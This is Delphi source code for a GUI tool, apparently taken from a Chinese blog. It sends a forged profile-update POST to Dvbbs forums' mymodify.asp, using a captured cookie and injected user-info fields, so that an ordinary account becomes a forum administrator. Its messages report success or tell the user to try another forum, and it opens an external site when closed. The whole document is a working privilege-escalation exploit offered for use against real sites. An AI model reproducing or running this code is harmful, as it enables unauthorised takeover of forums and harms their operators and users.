作者:Kendy文章来源:Kendy’sBlog
unitUnit1;
interface
uses
Windows,Messages,SysUtils,Variants,Classes,Graphics,Controls,Forms,
Dialogs,ScktComp,StdCtrls,ComCtrls,WinSkinData,ShellApi;
type
TForm1=class(TForm)
Label1:TLabel;
Label2:TLabel;
Label3:TLabel;
Edit1:TEdit;
Edit2:TEdit;
Edit3:TEdit;
Button1:TButton;
ClientSocket1:TClientSocket;
GroupBox1:TGroupBox;
Memo1:TMemo;
Label4:TLabel;
StatusBar1:TStatusBar;
SkinData1:TSkinData;
procedureButton1Click(Sender:TObject);
procedureClientSocket1Connect(Sender:TObject;
Socket:TCustomWinSocket);
procedureClientSocket1Read(Sender:TObject;Socket:TCustomWinSocket);
procedureClientSocket1Error(Sender:TObject;Socket:TCustomWinSocket;
ErrorEvent:TErrorEvent;varErrorCode:Integer);
procedureFormClose(Sender:TObject;varAction:TCloseAction);
private
{Privatedeclarations}
public
{Publicdeclarations}
end;
var
Form1:TForm1;
Data:string;
implementation
{$R*.dfm}
procedureTForm1.Button1Click(Sender:TObject);
var
sUrl,sUsername,sPOST,sReferer,sHost,sCookie,S:string;
i:integer;
begin
ClientSocket1.Close;
ifedit1.Text=’’then
begin
StatusBar1.Panels[0].Text:=’请输入论坛地址!’;
exit;
end;
ifedit2.Text=’’then
begin
StatusBar1.Panels[0].Text:=’请输入你的论坛账号!’;
exit;
end;
ifedit3.Text=’’then
begin
StatusBar1.Panels[0].Text:=’请输入抓取的Cookie!’;
exit;
end;
memo1.Text:=’’;
StatusBar1.Panels[0].Text:=’’;
Label4.Caption:=’’;
sUrl:=edit1.Text;
ifPos(’http://’,sUrl)<>0then
sUrl:=StringReplace(sUrl,’http://’,’’,[rfIgnoreCase]);
sUsername:=edit2.Text;
sCookie:=edit3.Text;
//--------Host-------------
i:=Pos(’/’,sUrl);
ifi<>0then
sHost:=Copy(sUrl,0,i-1)
else
sHost:=sUrl;
//--------Referer-----------
sReferer:=’http://’+sUrl+’/mymodify.asp’;
//--------POST--------------
sPost:=StringReplace(sUrl,sHost,’’,[rfIgnoreCase]);
sPost:=sPost+’/mymodify.asp?action=updat&username=’+sUsername;
//--------数据包------------
S:=’sex=1&face=Images%2Fuserface%2Fimage1.gif&myface=images/userface/image1.gif|||32|||32|||2003-12-30%’;
S:=S+’2016:34:00|||2005-6-19%2018:04:06|||25|||0|||管理员|||1||||||120|||115|||28|||0||||||210.41.235.200|||’;
S:=S+’0|||0|||0||||||0||||||level10.gif||||||9pc722664t5w7IM7|||0|0|0||||||Dvbbs&width=100&height=100’;
S:=S+’&birthday=&userphoto=&GroupName=%CE%DE%C3%C5%CE%DE%C5%C9&Signature=&showRe=0&usercookies=1&setuserinfo’;
S:=S+’=1&setusertrue=0&realname=&personal=&country=&userphone=&address=&province=&selectp=0&city=&selectc=0’;
S:=S+’&shengxiao=&blood=&belief=&occupation=&marital=&education=&college=&Submit=%B8%FC+%D0’;
Data:=’POST’+sPost+’HTTP/1.1’+#13#10;
Data:=Data+’Accept:image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/vnd.ms-excel,application/msword,application/x-shockwave-flash,*/*’+#13#10;
Data:=Data+’Referer:’+sReferer+#13#10;
Data:=Data+’Accept-Language:zh-cn’+#13#10;
Data:=Data+’Content-Type:application/x-www-form-urlencoded’+#13#10;
Data:=Data+’Accept-Encoding:gzip,deflate’+#13#10;
Data:=Data+’User-Agent:Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1;Maxthon;TencentTraveler)’+#13#10;
Data:=Data+’Host:’+sHost+#13#10;
Data:=Data+’Content-Length:585’+#13#10;
Data:=Data+’Connection:Keep-Alive’+#13#10;
Data:=Data+’Cache-Control:no-cache’+#13#10;
Data:=Data+’Cookie:’+sCookie+#13#10+#13#10;
Data:=Data+S;
//--------开始发送数据包-------------
ClientSocket1.Host:=sHost;
ClientSocket1.Port:=80;
ClientSocket1.Open;
StatusBar1.Panels[0].Text:=’数据发送中...’;
end;
procedureTForm1.ClientSocket1Connect(Sender:TObject;
Socket:TCustomWinSocket);
begin
Socket.SendText(Data);
end;
procedureTForm1.ClientSocket1Read(Sender:TObject;
Socket:TCustomWinSocket);
begin
memo1.Text:=Socket.ReceiveText;
ifPos(’您的修改信息已成功提交’,memo1.Text)<>0then
begin
Label4.Caption:=’>>成功提升为前台管理员!’;
StatusBar1.Panels[0].Text:=’成功,请重新登陆论坛!’;
end
else
begin
Label4.Caption:=’>>Sorry,提权失败’;
StatusBar1.Panels[0].Text:=’失败,换个论坛试试。’;
end;
end;
procedureTForm1.ClientSocket1Error(Sender:TObject;
Socket:TCustomWinSocket;ErrorEvent:TErrorEvent;
varErrorCode:Integer);
begin
ErrorCode:=0;
StatusBar1.Panels[0].Text:=’Error.....’;
Exit;
end;
procedureTForm1.FormClose(Sender:TObject;varAction:TCloseAction);
begin
ShellExecute(Handle,’open’,’http://aliwy.77169.com’,nil,nil,SW_SHOW);
end;
end.